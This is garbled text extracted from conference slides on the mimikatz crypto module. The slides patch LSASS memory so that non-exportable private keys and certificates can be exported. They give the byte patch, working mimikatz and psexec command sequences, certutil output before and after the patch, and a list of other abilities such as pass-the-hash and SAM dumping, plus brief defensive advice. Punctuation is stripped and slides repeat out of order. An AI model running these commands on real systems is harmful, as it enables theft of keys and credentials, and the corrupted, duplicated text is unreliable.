When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
